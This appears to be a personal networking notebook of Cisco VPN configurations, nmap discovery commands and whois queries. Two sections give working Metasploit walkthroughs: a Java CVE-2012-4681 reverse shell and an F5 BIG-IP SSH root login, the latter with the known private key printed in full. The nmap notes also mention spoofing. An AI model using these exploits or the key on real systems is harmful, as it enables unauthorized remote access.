# Dynamic and static VTI

Topology

[PC-1]----[ROUTER-1]----[ROUTER-2]----[PC-2]

[PC-1] eth0: 192.168.1.1/24

[ROUTER-1] fa0/1: 192.168.1.254/24
[ROUTER-1] fa0/0: 12.12.12.1/24
[ROUTER-1] vt1: 192.168.0.1/24 (virtual-template1)
[ROUTER-1] lo0: 192.168.0.1/24

[ROUTER-2] lo0: 192.168.0.2/24
[ROUTER-2] tu0: 192.168.0.2/24
[ROUTER-2] fa0/0: 12.12.12.2/24
[ROUTER-2) fa0/1: 192.168.2.254/24

[PC-2] eth0: 192.168.2.1/24

Dynamic VTI (Hub)

The hub cannot initiate a site-to-site VPN because it does not know the peer IP address.

ROUTER-1(config)# crypto isakmp policy 1
ROUTER-1(config-isakmp)# authentication pre-share
ROUTER-1(config-isakmp)# encryption aes
ROUTER-1(config-isakmp)# hash sha
ROUTER-1(config-isakmp)# group 2
ROUTER-1(config-isakmp)# lifetime 86400
ROUTER-1(config)# crypto isakmp aggressive-mode disable
ROUTER-1(config)# crypto keyring KEYRING
ROUTER-1(conf-keyring)# pre-shared-key address 0.0.0.0 0.0.0.0 key 0 SECRET_KEY
ROUTER-1(config)# crypto isakmp enable
ROUTER-1(config)# crypto ipsec transform-set TRANSFORM_SET esp-aes esp-sha-hmac
ROUTER-1(config)# crypto isakmp profile PROFILE
ROUTER-1(conf-isa-prof)# match identity address 0.0.0.0 0.0.0.0
ROUTER-1(conf-isa-prof)# keyring KEYRING
ROUTER-1(conf-isa-prof)# virtual-template 1
ROUTER-1(config)# crypto ipsec profile PROFILE
ROUTER-1(config-profile)# set transform-set TRANSFORM_SET
ROUTER-1(config-profile)# set isakmp-profile PROFILE
ROUTER-1(config-profile)# set pfs group2
ROUTER-1(config)# interface lo0
ROUTER-1(config-if)# ip address 192.168.0.1 255.255.255.0
ROUTER-1(config)# interface fa0/0
ROUTER-1(config-if)# ip nat outside
ROUTER-1(config)# interface fa0/1
ROUTER-1(config-if)# ip nat inside
ROUTER-1(config)# interface virtual-template1 type tunnel
ROUTER-1(config-if)# ip unnumbered lo0
ROUTER-1(config-if)# tunnel source fa0/0
ROUTER-1(config-if)# tunnel mode ipsec ipv4
ROUTER-1(config-if)# tunnel protection ipsec profile PROFILE
ROUTER-1(config)# ip route 0.0.0.0 0.0.0.0 12.12.12.2
ROUTER-1(config)# ip access-list extended ACL_NAT
ROUTER-1(config-ext-nacl)# permit ip any any
ROUTER-1(config)# ip nat inside source list ACL_NAT interface fa0/0 overload
ROUTER-1(config)# router ospf 1
ROUTER-1(config-router)# network 192.168.0.0 0.0.255.255 area 0
ROUTER-1(config-router)# passive-interface default
ROUTER-1(config-router)# no passive-interface virtual-template1

Static VTI (Spoke)

The spokes initiate the site-to-site VPN.

ROUTER-2(config)# crypto isakmp policy 1
ROUTER-2(config-isakmp)# authentication pre-share
ROUTER-2(config-isakmp)# encryption aes
ROUTER-2(config-isakmp)# hash sha
ROUTER-2(config-isakmp)# group 2
ROUTER-2(config-isakmp)# lifetime 86400
ROUTER-2(config)# crypto isakmp aggressive-mode disable
ROUTER-2(config)# crypto isakmp key 0 SECRET_KEY address 12.12.12.1
ROUTER-2(config)# crypto isakmp enable
ROUTER-2(config)# crypto ipsec transform-set TRANSFORM_SET esp-aes esp-sha-hmac
ROUTER-2(config)# crypto ipsec profile PROFILE
ROUTER-2(config-crypto-map)# set transform-set TRANSFORM_SET
ROUTER-2(config-crypto-map)# set pfs group2
ROUTER-2(config)# interface lo0
ROUTER-2(config-if)# ip address 192.168.0.2 255.255.255.0
ROUTER-2(config)# interface fa0/0
ROUTER-2(config-if)# ip nat outside
ROUTER-2(config)# interface fa0/1
ROUTER-2(config-if)# ip nat inside
ROUTER-2(config)# interface tu0
ROUTER-2(config-if)# ip unnumbered lo0
ROUTER-2(config-if)# tunnel source fa0/0
ROUTER-2(config-if)# tunnel destination 12.12.12.1
ROUTER-2(config-if)# tunnel mode ipsec ipv4
ROUTER-2(config-if)# tunnel protection ipsec profile PROFILE
ROUTER-2(config)# ip route 0.0.0.0 0.0.0.0 12.12.12.1
ROUTER-2(config)# ip access-list extended ACL_NAT
ROUTER-2(config-ext-nacl)# permit ip any any
ROUTER-2(config)# ip nat inside source list ACL_NAT interface fa0/0 overload
ROUTER-2(config)# router ospf 1
ROUTER-2(config-router)# network 192.168.0.0 0.0.255.255 area 0
ROUTER-2(config-router)# passive-interface default
ROUTER-2(config-router)# no passive-interface tu0

# GRE over IPsec

Topology

[PC-1]----[ROUTER-1]----[ROUTER-2]----[PC-2]

[PC-1] eth0: 192.168.1.1/24

[ROUTER-1] fa0/1: 192.168.1.254/24
[ROUTER-1] fa0/0: 12.12.12.1/24
[ROUTER-1] tu0: 12.0.0.1/24

[ROUTER-2] tu0: 12.0.0.2/24
[ROUTER-2] fa0/0: 12.12.12.2/24
[ROUTER-2) fa0/1: 192.168.2.254/24

[PC-2] eth0: 192.168.2.1/24

Using static crypto maps

ROUTER-1(config)# crypto isakmp policy 1
ROUTER-1(config-isakmp)# authentication pre-share
ROUTER-1(config-isakmp)# encryption aes
ROUTER-1(config-isakmp)# hash sha
ROUTER-1(config-isakmp)# group 2
ROUTER-1(config-isakmp)# lifetime 86400
ROUTER-1(config)# crypto isakmp aggressive-mode disable
ROUTER-1(config)# crypto isakmp key 0 SECRET_KEY address 12.12.12.2
ROUTER-1(config)# crypto isakmp enable
ROUTER-1(config)# ip access-list extended CRYPTO_ACL
ROUTER-1(config-ext-nacl)# permit gre host 12.12.12.1 host 12.12.12.2
ROUTER-1(config)# crypto ipsec transform-set TRANSFORM_SET esp-aes esp-sha-hmac
ROUTER-1(config)# crypto map CRYPTO_MAP 1 ipsec-isakmp
ROUTER-1(config-crypto-map)# set peer 12.12.12.2
ROUTER-1(config-crypto-map)# match address CRYPTO_ACL
ROUTER-1(config-crypto-map)# set transform-set TRANSFORM_SET
ROUTER-1(config-crypto-map)# set pfs group2
ROUTER-1(config)# interface fa0/0
ROUTER-1(config-if)# crypto map CRYPTO_MAP
ROUTER-1(config-if)# ip nat outside
ROUTER-1(config)# interface fa0/1
ROUTER-1(config-if)# ip nat inside
ROUTER-1(config)# interface tu0
ROUTER-1(config-if)# ip address 12.0.0.1 255.255.255.0
ROUTER-1(config-if)# tunnel source fa0/0
ROUTER-1(config-if)# tunnel destination 12.12.12.2
ROUTER-1(config)# ip route 192.168.2.0 255.255.255.0 12.0.0.2
ROUTER-1(config)# ip route 0.0.0.0 0.0.0.0 12.12.12.2
ROUTER-1(config)# ip access-list extended ACL_NAT
ROUTER-1(config-ext-nacl)# permit ip any any
ROUTER-1(config)# ip nat inside source list ACL_NAT interface fa0/0 overload

ROUTER-2(config)# crypto isakmp policy 1
ROUTER-2(config-isakmp)# authentication pre-share
ROUTER-2(config-isakmp)# encryption aes
ROUTER-2(config-isakmp)# hash sha
ROUTER-2(config-isakmp)# group 2
ROUTER-2(config-isakmp)# lifetime 86400
ROUTER-2(config)# crypto isakmp aggressive-mode disable
ROUTER-2(config)# crypto isakmp key 0 SECRET_KEY address 12.12.12.1
ROUTER-2(config)# crypto isakmp enable
ROUTER-2(config)# ip access-list extended CRYPTO_ACL
ROUTER-2(config-ext-nacl)# permit gre host 12.12.12.2 host 12.12.12.1
ROUTER-2(config)# crypto ipsec transform-set TRANSFORM_SET esp-aes esp-sha-hmac
ROUTER-2(config)# crypto map CRYPTO_MAP 1 ipsec-isakmp
ROUTER-2(config-crypto-map)# set peer 12.12.12.1
ROUTER-2(config-crypto-map)# match address CRYPTO_ACL
ROUTER-2(config-crypto-map)# set transform-set TRANSFORM_SET
ROUTER-2(config-crypto-map)# set pfs group2
ROUTER-2(config)# interface fa0/0
ROUTER-2(config-if)# crypto map CRYPTO_MAP
ROUTER-2(config-if)# ip nat outside
ROUTER-2(config)# interface fa0/1
ROUTER-2(config-if)# ip nat inside
ROUTER-2(config)# interface tu0
ROUTER-2(config-if)# ip address 12.0.0.2 255.255.255.0
ROUTER-2(config-if)# tunnel source fa0/0
ROUTER-2(config-if)# tunnel destination 12.12.12.1
ROUTER-2(config)# ip route 192.168.1.0 255.255.255.0 12.0.0.1
ROUTER-2(config)# ip route 0.0.0.0 0.0.0.0 12.12.12.1
ROUTER-2(config)# ip access-list extended ACL_NAT
ROUTER-2(config-ext-nacl)# permit ip any any
ROUTER-2(config)# ip nat inside source list ACL_NAT interface fa0/0 overload

Using profiles

ROUTER-1(config)# crypto isakmp policy 1
ROUTER-1(config-isakmp)# authentication pre-share
ROUTER-1(config-isakmp)# encryption aes
ROUTER-1(config-isakmp)# hash sha
ROUTER-1(config-isakmp)# group 2
ROUTER-1(config-isakmp)# lifetime 86400
ROUTER-1(config)# crypto isakmp aggressive-mode disable
ROUTER-1(config)# crypto isakmp key 0 SECRET_KEY address 12.12.12.2
ROUTER-1(config)# crypto isakmp enable
ROUTER-1(config)# crypto ipsec transform-set TRANSFORM_SET esp-aes esp-sha-hmac
ROUTER-1(config)# crypto ipsec profile PROFILE
ROUTER-1(config-profile)# set transform-set TRANSFORM_SET
ROUTER-1(config-profile)# set pfs group2
ROUTER-1(config)# interface fa0/0
ROUTER-1(config-if)# ip nat outside
ROUTER-1(config)# interface fa0/1
ROUTER-1(config-if)# ip nat inside
ROUTER-1(config)# interface tu0
ROUTER-1(config-if)# ip address 12.0.0.1 255.255.255.0
ROUTER-1(config-if)# tunnel source fa0/0
ROUTER-1(config-if)# tunnel destination 12.12.12.2
ROUTER-1(config-if)# tunnel protection ipsec profile PROFILE
ROUTER-1(config)# ip route 192.168.2.0 255.255.255.0 12.0.0.2
ROUTER-1(config)# ip route 0.0.0.0 0.0.0.0 12.12.12.2
ROUTER-1(config)# ip access-list extended ACL_NAT
ROUTER-1(config-ext-nacl)# permit ip any any
ROUTER-1(config)# ip nat inside source list ACL_NAT interface fa0/0 overload

ROUTER-2(config)# crypto isakmp policy 1
ROUTER-2(config-isakmp)# authentication pre-share
ROUTER-2(config-isakmp)# encryption aes
ROUTER-2(config-isakmp)# hash sha
ROUTER-2(config-isakmp)# group 2
ROUTER-2(config-isakmp)# lifetime 86400
ROUTER-2(config)# crypto isakmp aggressive-mode disable
ROUTER-2(config)# crypto isakmp key 0 SECRET_KEY address 12.12.12.1
ROUTER-2(config)# crypto isakmp enable
ROUTER-2(config)# crypto ipsec transform-set TRANSFORM_SET esp-aes esp-sha-hmac
ROUTER-2(config)# crypto ipsec profile PROFILE
ROUTER-2(config-crypto-map)# set transform-set TRANSFORM_SET
ROUTER-2(config-crypto-map)# set pfs group2
ROUTER-2(config)# interface fa0/0
ROUTER-2(config-if)# ip nat outside
ROUTER-2(config)# interface fa0/1
ROUTER-2(config-if)# ip nat inside
ROUTER-2(config)# interface tu0
ROUTER-2(config-if)# ip address 12.0.0.2 255.255.255.0
ROUTER-2(config-if)# tunnel source fa0/0
ROUTER-2(config-if)# tunnel destination 12.12.12.1
ROUTER-2(config-if)# tunnel protection ipsec profile PROFILE
ROUTER-2(config)# ip route 192.168.1.0 255.255.255.0 12.0.0.1
ROUTER-2(config)# ip route 0.0.0.0 0.0.0.0 12.12.12.1
ROUTER-2(config)# ip access-list extended ACL_NAT
ROUTER-2(config-ext-nacl)# permit ip any any
ROUTER-2(config)# ip nat inside source list ACL_NAT interface fa0/0 overload

# Dynamic and static crypto maps

Topology

[PC-1]----[ROUTER-1]----[ROUTER-2]----[PC-2]

[PC-1] eth0: 192.168.1.1/24

[ROUTER-1] fa0/1: 192.168.1.254/24
[ROUTER-1] fa0/0: 12.12.12.1/24

[ROUTER-2] fa0/0: 12.12.12.2/24
[ROUTER-2) fa0/1: 192.168.2.254/24

[PC-2] eth0: 192.168.2.1/24

Dynamic crypto map (Hub)

The hub cannot initiate a site-to-site VPN because it does not know the peer IP address.

ROUTER-1(config)# crypto isakmp policy 1
ROUTER-1(config-isakmp)# authentication pre-share
ROUTER-1(config-isakmp)# encryption aes
ROUTER-1(config-isakmp)# hash sha
ROUTER-1(config-isakmp)# group 2
ROUTER-1(config-isakmp)# lifetime 86400
ROUTER-1(config)# crypto isakmp aggressive-mode disable
ROUTER-1(config)# crypto isakmp key 0 SECRET_KEY address 0.0.0.0 0.0.0.0
ROUTER-1(config)# crypto isakmp enable
ROUTER-1(config)# crypto ipsec transform-set TRANSFORM_SET esp-aes esp-sha-hmac
ROUTER-1(config)# crypto dynamic-map DYNAMIC-MAP 1
ROUTER-1(config-crypto-map)# set transform-set TRANSFORM_SET
ROUTER-1(config-crypto-map)# set pfs group2
ROUTER-1(config)# crypto map CRYPTO_MAP 1 ipsec-isakmp dynamic DYNAMIC-MAP
ROUTER-1(config)# interface fa0/0
ROUTER-1(config-if)# crypto map CRYPTO_MAP
ROUTER-1(config-if)# ip nat outside
ROUTER-1(config)# interface fa0/1
ROUTER-1(config-if)# ip nat inside
ROUTER-1(config)# ip route 0.0.0.0 0.0.0.0 12.12.12.2
ROUTER-1(config)# ip access-list extended ACL_NONAT
ROUTER-1(config-ext-nacl)# deny ip 192.168.1.0 0.0.0.255 192.168.0.0 0.0.255.255
ROUTER-1(config-ext-nacl)# permit ip any any
ROUTER-1(config)# ip nat inside source list ACL_NONAT interface fa0/0 overload

Static crypto map (Spoke)

The spokes initiate the site-to-site VPN.

ROUTER-2(config)# crypto isakmp policy 1
ROUTER-2(config-isakmp)# authentication pre-share
ROUTER-2(config-isakmp)# encryption aes
ROUTER-2(config-isakmp)# hash sha
ROUTER-2(config-isakmp)# group 2
ROUTER-2(config-isakmp)# lifetime 86400
ROUTER-2(config)# crypto isakmp aggressive-mode disable
ROUTER-2(config)# crypto isakmp key 0 SECRET_KEY address 12.12.12.1
ROUTER-2(config)# crypto isakmp enable
ROUTER-2(config)# ip access-list extended CRYPTO_ACL
ROUTER-2(config-ext-nacl)# permit ip 192.168.2.0 0.0.0.255 192.168.1.0 0.0.0.255
ROUTER-2(config)# crypto ipsec transform-set TRANSFORM_SET esp-aes esp-sha-hmac
ROUTER-2(config)# crypto map CRYPTO_MAP 1 ipsec-isakmp
ROUTER-2(config-crypto-map)# set peer 12.12.12.1
ROUTER-2(config-crypto-map)# match address CRYPTO_ACL
ROUTER-2(config-crypto-map)# set transform-set TRANSFORM_SET
ROUTER-2(config-crypto-map)# set pfs group2
ROUTER-2(config)# interface fa0/0
ROUTER-2(config-if)# crypto map CRYPTO_MAP
ROUTER-2(config-if)# ip nat outside
ROUTER-2(config)# interface fa0/1
ROUTER-2(config-if)# ip nat inside
ROUTER-2(config)# ip route 192.168.1.0 255.255.255.0 12.12.12.1
ROUTER-2(config)# ip access-list extended ACL_NONAT
ROUTER-2(config-ext-nacl)# deny ip 192.168.2.0 0.0.0.255 192.168.1.0 0.0.0.255
ROUTER-2(config-ext-nacl)# permit ip any any
ROUTER-2(config)# ip nat inside source list ACL_NONAT interface fa0/0 overload

# Nmap Host Discovery

Source file

# cat ip_list.txt
1.1.1.0
1.1.1.1
1.1.1.2
1.1.1.3
1.1.1.4
1.1.1.5
1.1.1.6
1.1.1.7
1.1.1.8
1.1.1.9
# nmap -n -sL -iL ip_list.txt

Reverse DNS resolution

# cat /etc/resolv.conf
nameserver 8.8.8.8
# nmap --dns-servers 8.8.4.4 -sL 1.1.1.0/24

Only ping scan -sP

ICMP echo request -PE:

# nmap --dns-servers 8.8.4.4 -sP -PE 1.1.1.1

ICMP timestamp request -PP:

# nmap --dns-servers 8.8.4.4 -sP -PP 1.1.1.1

ICMP address mask request -PM:

# nmap --dns-servers 8.8.4.4 -sP -PM 1.1.1.1

TCP SYN ping -PS:

# nmap --dns-servers 8.8.4.4 -sP -PS80 1.1.1.1

TCP ACK ping -PA:

# nmap --dns-servers 8.8.4.4 -sP -PA80 1.1.1.1

UDP ping -PU:

# nmap --dns-servers 8.8.4.4 -sP -PU53 1.1.1.1

IP protocol ping -PO:

# nmap --dns-servers 8.8.4.4 -sP -POicmp,igmp 1.1.1.1

ARP scan -PR (local ethernet host):

# nmap --dns-servers 192.168.1.10 -sP -PR 192.168.1.1

Related options:

--verbose
--source-port _port_
-n disables DNS resolution
--data-length _length_ adds random bytes to every packet
--ttl _value_
-T3, -T4, -T5 speed up ping scanning
--max-parallelism _value_
--max-rtt-timeout _value_ how long nmap waits for a ping response
-oA, -oN, -oG, -oX different outputs
--packet-trace provides more detail
--D _decoy1_ adds some noise

Spoof your real source address -e _intf_ -S _spoofed-ip_:

# nmap --dns-servers 8.8.4.4 -sP -PS80 -e ppp0 -S 2.2.2.2 1.1.1.1

Skip discovery stage -PN and begin default scanning stage

No matter if the host is up and running:

# nmap -PN 1.1.1.1

# RIPE whois queries

Introduction

https://www.ripe.net/data-tools/support/documentation/queries-ref-card


Direct queries

# whois -B -h whois.ripe.net 217.148.69.0
# whois -B -h whois.ripe.net 217.148.69.0/24
# whois -B -h whois.ripe.net CAIXA
# whois -B -h whois.ripe.net EdJ9-RIPE
# whois -B -h whois.ripe.net edejuan@lacaixa.es
# whois -B -h whois.ripe.net LACAIXA-MNT
# whois -B -h whois.ripe.net AS16383

Inverse queries

# whois -B -h whois.ripe.net -i person EdJ9-RIPE
# whois -B -h whois.ripe.net -i notify edejuan@lacaixa.es
# whois -B -h whois.ripe.net -i mnt-by LACAIXA-MNT
# whois -B -h whois.ripe.net -i origin AS16383
# whois -B -h whois.ripe.net -i nserver ns1.lacaixa.com

Commonly used flags

# whois -B -h whois.ripe.net -r 217.148.69.0 ! Disables recursive search
# whois -B -h whois.ripe.net -L 217.148.69.0 ! All less specific objects

# Exploiting Java 0day

Introduction

http://cve.mitre.org/cgi-bin/cvename.cgi?name=2012-4681

Metasploit

# msfconsole

msf > use exploit/multi/browser/java_jre17_exec
msf  exploit(java_jre17_exec) > set payload java/shell/reverse_tcp
msf  exploit(java_jre17_exec) > set srvhost 192.168.0.2
msf  exploit(java_jre17_exec) > set lhost 192.168.0.2
msf  exploit(java_jre17_exec) > exploit
[*] Exploit running as background job.

[*] Started reverse handler on 192.168.0.2:4444 
msf  exploit(java_jre17_exec) > [*] Using URL: http://192.168.0.2:8080/UxFhxobmVYzm
[*] Server started.
[*] 192.168.0.1      java_jre17_exec - Java 7 Applet Remote Code Execution handling request
[*] 192.168.0.1      java_jre17_exec - Sending Applet.jar
[*] 192.168.0.1      java_jre17_exec - Sending Applet.jar
[*] 192.168.0.1      java_jre17_exec - Sending Applet.jar
[*] Sending stage (2976 bytes) to 192.168.0.1
[*] Command shell session 1 opened (192.168.0.2:4444 -> 192.168.0.1:1139)

msf  exploit(java_jre17_exec) > sessions -i 1
[*] Starting interaction with 1...

Microsoft Windows XP [Version 5.1.2600]
(C) Copyright 1985-2001 Microsoft Corp.

C:\Documents and Settings\User\Desktop>

# Exploiting F5 BIG-IP SSH vulnerability

Introduction

http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2012-1493
http://support.f5.com/kb/en-us/solutions/public/13000/600/sol13600.html

Option 1: Command-line

# cat f5_private_key 
-----BEGIN RSA PRIVATE KEY-----
MIICWgIBAAKBgQC8iELmyRPPHIeJ//uLLfKHG4rr84HXeGM+quySiCRgWtxbw4rh
UlP7n4XHvB3ixAKdWfys2pqHD/Hqx9w4wMj9e+fjIpTi3xOdh/YylRWvid3Pf0vk
OzWftKLWbay5Q3FZsq/nwjz40yGW3YhOtpK5NTQ0bKZY5zz4s2L4wdd0uQIBIwKB
gBWL6mOEsc6G6uszMrDSDRbBUbSQ26OYuuKXMPrNuwOynNdJjDcCGDoDmkK2adDF
8auVQXLXJ5poOOeh0AZ8br2vnk3hZd9mnF+uyDB3PO/tqpXOrpzSyuITy5LJZBBv
7r7kqhyBs0vuSdL/D+i1DHYf0nv2Ps4aspoBVumuQid7AkEA+tD3RDashPmoQJvM
2oWS7PO6ljUVXszuhHdUOaFtx60ZOg0OVwnh+NBbbszGpsOwwEE+OqrKMTZjYg3s
37+x/wJBAMBtwmoi05hBsA4Cvac66T1Vdhie8qf5dwL2PdHfu6hbOifSX/xSPnVL
RTbwU9+h/t6BOYdWA0xr0cWcjy1U6UcCQQDBfKF9w8bqPO+CTE2SoY6ZiNHEVNX4
rLf/ycShfIfjLcMA5YAXQiNZisow5xznC/1hHGM0kmF2a8kCf8VcJio5AkBi9p5/
uiOtY5xe+hhkofRLbce05AfEGeVvPM9V/gi8+7eCMa209xjOm70yMnRHIBys8gBU
Ot0f/O+KM0JR0+WvAkAskPvTXevY5wkp5mYXMBlUqEd7R3vGBV/qp4BldW5l0N4G
LesWvIh6+moTbFuPRoQnGO2P6D7Q5sPPqgqyefZS
-----END RSA PRIVATE KEY-----
# chmod 0600 f5_private_key
# ssh -i f5_private_key root@192.168.1.1
[root@F5-BIG-IP:Active] config # bigpipe platform | grep Platform
|     BIOS revision: F5 Platform: C103 OBJ-0335-01 BIOS (build: 130) Date: 09/12/09
[root@F5-BIG-IP:Active] config # bigpipe version | grep Version
BIG-IP Version 10.2.2 969.0
[root@F5-BIG-IP:Active] config # whoami
root

Option 2: PuTTY

- Use PuTTYGen to obtain a private ppk file from f5_private_key
- Execute PuTTY
- Connection/SSH/Auth/Private key file for authentication/Browse...: C:\f5_private_key.ppk
- Session/Host Name (or IP address) and Port: 192.168.1.1:22
- Open

login as: root
Authenticating with public key "imported-openssh-key"
[root@F5-BIG-IP:Active] config # whoami
root

Option 3: Metasploit

# msfconsole

msf > use exploit/linux/ssh/f5_bigip_known_privkey
msf  exploit(f5_bigip_known_privkey) > show payloads
msf  exploit(f5_bigip_known_privkey) > set payload cmd/unix/interact
msf  exploit(f5_bigip_known_privkey) > set lhost 192.168.1.2
msf  exploit(f5_bigip_known_privkey) > set rhost 192.168.1.1
msf  exploit(f5_bigip_known_privkey) > exploit

[+] Successful login
[*] Found shell.
[*] Command shell session 1 opened (192.168.1.2:42298 -> 192.168.1.1:22)

whoami
root

# Dynamic Multipoint VPN (DMVPN)

Topology

[ROUTER-0]-----[ROUTER-1]
[ROUTER-0]-----[ROUTER-2]
[ROUTER-0]-----[ROUTER-3]

[ROUTER-1] is the NHRP server.
[ROUTER-2] and [ROUTER-3] are the NHRP clients.

[ROUTER-0] fa0/1: 192.168.1.254/24
[ROUTER-0] fa0/2: 192.168.2.254/24
[ROUTER-0] fa0/3: 192.168.3.254/24

[ROUTER-1] fa0/0: 192.168.1.1/24
[ROUTER-2] fa0/0: 192.168.2.2/24
[ROUTER-3] fa0/0: 192.168.3.3/24

ROUTER-1 configuration

Network

ROUTER-1(config)# interface FastEthernet0/0
ROUTER-1(config-if)# ip address 192.168.1.1 255.255.255.0
ROUTER-1(config)# ip route 0.0.0.0 0.0.0.0 192.168.1.254

Multipoint GRE (mGRE) and Next Hop Resolution Protocol (NHRP)

ROUTER-1(config)# interface Tunnel1
ROUTER-1(config-if)# ip address 1.2.3.1 255.255.255.0
ROUTER-1(config-if)# ip nhrp authentication NHRP_KEY
ROUTER-1(config-if)# ip nhrp map multicast dynamic
ROUTER-1(config-if)# ip nhrp network-id 123
ROUTER-1(config-if)# tunnel source FastEthernet0/0
ROUTER-1(config-if)# tunnel mode gre multipoint
ROUTER-1(config-if)# tunnel key 123

IPsec

ROUTER-1(config)# crypto isakmp policy 1
ROUTER-1(config-isakmp)# authentication pre-share
ROUTER-1(config-isakmp)# encryption aes
ROUTER-1(config-isakmp)# hash sha
ROUTER-1(config-isakmp)# group 2
ROUTER-1(config-isakmp)# lifetime 86400
ROUTER-1(config)# crypto isakmp aggressive-mode disable
ROUTER-1(config)# crypto isakmp key SECRET_KEY address 192.168.2.2
ROUTER-1(config)# crypto isakmp key SECRET_KEY address 192.168.3.3
ROUTER-1(config)# crypto isakmp enable
ROUTER-1(config)# crypto ipsec transform-set TRANSFORM_SET esp-aes esp-sha-hmac
ROUTER-1(config)# crypto ipsec profile PROFILE
ROUTER-1(ipsec-profile)# set transform-set TRANSFORM_SET
ROUTER-1(ipsec-profile)# set pfs group2
ROUTER-1(config)# interface Tunnel1
ROUTER-1(config-if)# tunnel protection ipsec profile PROFILE

ROUTER-2 configuration

Network

ROUTER-2(config)# interface FastEthernet0/0
ROUTER-2(config-if)# ip address 192.168.2.2 255.255.255.0
ROUTER-2(config)# ip route 0.0.0.0 0.0.0.0 192.168.2.254

Multipoint GRE (mGRE) and Next Hop Resolution Protocol (NHRP)

ROUTER-2(config)# interface Tunnel2
ROUTER-2(config-if)# ip address 1.2.3.2 255.255.255.0
ROUTER-2(config-if)# ip nhrp authentication NHRP_KEY
ROUTER-2(config-if)# ip nhrp map 1.2.3.1 192.168.1.1
ROUTER-2(config-if)# ip nhrp network-id 123
ROUTER-2(config-if)# ip nhrp nhs 1.2.3.1
ROUTER-2(config-if)# tunnel source FastEthernet0/0
ROUTER-2(config-if)# tunnel mode gre multipoint
ROUTER-2(config-if)# tunnel key 123

IPsec

ROUTER-2(config)# crypto isakmp policy 1
ROUTER-2(config-isakmp)# authentication pre-share
ROUTER-2(config-isakmp)# encryption aes
ROUTER-2(config-isakmp)# hash sha
ROUTER-2(config-isakmp)# group 2
ROUTER-2(config-isakmp)# lifetime 86400
ROUTER-2(config)# crypto isakmp aggressive-mode disable
ROUTER-2(config)# crypto isakmp key SECRET_KEY address 192.168.1.1
ROUTER-2(config)# crypto isakmp enable
ROUTER-2(config)# crypto ipsec transform-set TRANSFORM_SET esp-aes esp-sha-hmac
ROUTER-2(config)# crypto ipsec profile PROFILE
ROUTER-2(ipsec-profile)# set transform-set TRANSFORM_SET
ROUTER-2(ipsec-profile)# set pfs group2
ROUTER-2(config)# interface Tunnel2
ROUTER-2(config-if)# tunnel protection ipsec profile PROFILE

ROUTER-3 configuration

Network

ROUTER-3(config)# interface FastEthernet0/0
ROUTER-3(config-if)# ip address 192.168.3.3 255.255.255.0
ROUTER-3(config)# ip route 0.0.0.0 0.0.0.0 192.168.3.254

Multipoint GRE (mGRE) and Next Hop Resolution Protocol (NHRP)

ROUTER-3(config)# interface Tunnel3
ROUTER-3(config-if)# ip address 1.2.3.3 255.255.255.0
ROUTER-3(config-if)# ip nhrp authentication NHRP_KEY
ROUTER-3(config-if)# ip nhrp map 1.2.3.1 192.168.1.1
ROUTER-3(config-if)# ip nhrp network-id 123
ROUTER-3(config-if)# ip nhrp nhs 1.2.3.1
ROUTER-3(config-if)# tunnel source FastEthernet0/0
ROUTER-3(config-if)# tunnel mode gre multipoint
ROUTER-3(config-if)# tunnel key 123

IPsec

ROUTER-3(config)# crypto isakmp policy 1
ROUTER-3(config-isakmp)# authentication pre-share
ROUTER-3(config-isakmp)# encryption aes
ROUTER-3(config-isakmp)# hash sha
ROUTER-3(config-isakmp)# group 2
ROUTER-3(config-isakmp)# lifetime 86400
ROUTER-3(config)# crypto isakmp aggressive-mode disable
ROUTER-3(config)# crypto isakmp key SECRET_KEY address 192.168.1.1
ROUTER-3(config)# crypto isakmp enable
ROUTER-3(config)# crypto ipsec transform-set TRANSFORM_SET esp-aes esp-sha-hmac
ROUTER-3(config)# crypto ipsec profile PROFILE
ROUTER-3(ipsec-profile)# set transform-set TRANSFORM_SET
ROUTER-3(ipsec-profile)# set pfs group2
ROUTER-3(config)# interface Tunnel3
ROUTER-3(config-if)# tunnel protection ipsec profile PROFILE

Troubleshooting commands

Router# show ip nhrp
Router# show dmvpn
Router# show crypto isakmp sa
Router# show crypto ipsec sa

# Site-to-site IPsec VPN configurations

Topology

[PC-1]----[VPN_DEVICE-1]----[VPN_DEVICE-2]----[PC-2]

[VPN_DEVICE-1] can be a Cisco ASA (ASA-1), a Cisco router (ROUTER-1) or an Openswan (LINUX-1).
[VPN_DEVICE-2] can be a Cisco ASA (ASA-2), a Cisco router (ROUTER-2) or an Openswan (LINUX-2).

[PC-1] eth0: 192.168.1.1/24

[VPN_DEVICE-1]
(ASA-1) e0/1, (ROUTER-1) fa0/1, (LINUX-1) fa0/1: 192.168.1.254/24
(ASA-1) e0/0, (ROUTER-1) fa0/0, (LINUX-1) fa0/0: 12.12.12.1/24

[VPN_DEVICE-2]
(ASA-2) e0/0, (ROUTER-2) fa0/0, (LINUX-2) fa0/0: 12.12.12.2/24
(ASA-2) e0/1, (ROUTER-2) fa0/1, (LINUX-2) fa0/1: 192.168.2.254/24

[PC-2] eth0: 192.168.2.1/24

Between two ASAs

ASA-1(config)# crypto ikev1 policy 1 ! crypto isakmp
ASA-1(config-ikev1-policy)# authentication pre-share
ASA-1(config-ikev1-policy)# encryption aes
ASA-1(config-ikev1-policy)# hash sha
ASA-1(config-ikev1-policy)# group 2
ASA-1(config-ikev1-policy)# lifetime 86400
ASA-1(config)# crypto ikev1 am-disable
ASA-1(config)# crypto ikev1 enable outside ! crypto isakmp
ASA-1(config)# tunnel-group 12.12.12.2 type ipsec-l2l
ASA-1(config)# tunnel-group 12.12.12.2 ipsec-attributes
ASA-1(config-tunnel-ipsec)# pre-shared-key SECRET_KEY
ASA-1(config)# access-list CRYPTO_ACL permit ip 192.168.1.0 255.255.255.0 192.168.2.0 255.255.255.0
ASA-1(config)# crypto ipsec transform-set TRANSFORM_SET esp-aes esp-sha-hmac
ASA-1(config)# crypto map CRYPTO_MAP 1 set peer 12.12.12.2
ASA-1(config)# crypto map CRYPTO_MAP 1 match address CRYPTO_ACL
ASA-1(config)# crypto map CRYPTO_MAP 1 set transform-set TRANSFORM_SET
ASA-1(config)# crypto map CRYPTO_MAP 1 set pfs group2
ASA-1(config)# crypto map CRYPTO_MAP interface outside
ASA-1(config)# route outside 192.168.2.0 255.255.255.0 12.12.12.2
ASA-1(config)# object network INSIDE_NET
ASA-1(config-network-object)# subnet 192.168.1.0 255.255.255.0
ASA-1(config)# object network OUTSIDE_NET
ASA-1(config-network-object)# subnet 192.168.2.0 255.255.255.0
ASA-1(config)# nat (inside,outside) source static INSIDE_NET INSIDE_NET
